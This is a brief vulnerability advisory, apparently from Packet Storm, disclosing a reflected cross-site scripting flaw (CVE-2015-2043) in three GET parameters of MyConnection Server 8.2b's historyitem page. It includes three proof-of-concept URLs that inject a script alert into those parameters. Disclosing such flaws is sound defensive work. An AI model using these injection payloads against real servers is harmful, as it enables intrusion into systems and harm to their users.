MyConnection Server version 8.2b suffers from a cross site scripting vulnerability.
c9ab77625e1367cca46f4d58fe3c3178212c8c6049ec8e802f27e40fb5e81473Title: MyConnection Server 8.2b GET Reflected XSS
Severity: High
CVE-ID: CVE-2015-2043
Release Date: 23 February 2015
Author: Kenneth F. Belva
Websites: http://silverbackventuresllc.com
http://xssWarrior.com
http://securitymaverick.com
Twitter: @infosecmaverick
Contact: Please use website contact form.
Mail:
URL: http://www.myconnectionserver.com/
Vendor:
Remote Exploit: Yes
Discovered with: xssWarrior - http://xssWarrior.com
Description:
============
The application MyConnection Server 8.2b suffers from XSS vulnerabilities in three fields in the historyitem page. The three fields are:
bt=
variable=
et=
Proof of Concept :
==================
http://vulnsite.com/myspeed/db/historyitem?bt="');+alert(10);+//
http://vulnsite.com/myspeed/db/historyitem?variable="');+alert(10);+//
http://vulnsite.com/myspeed/db/historyitem?et="');+alert(10);+//
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed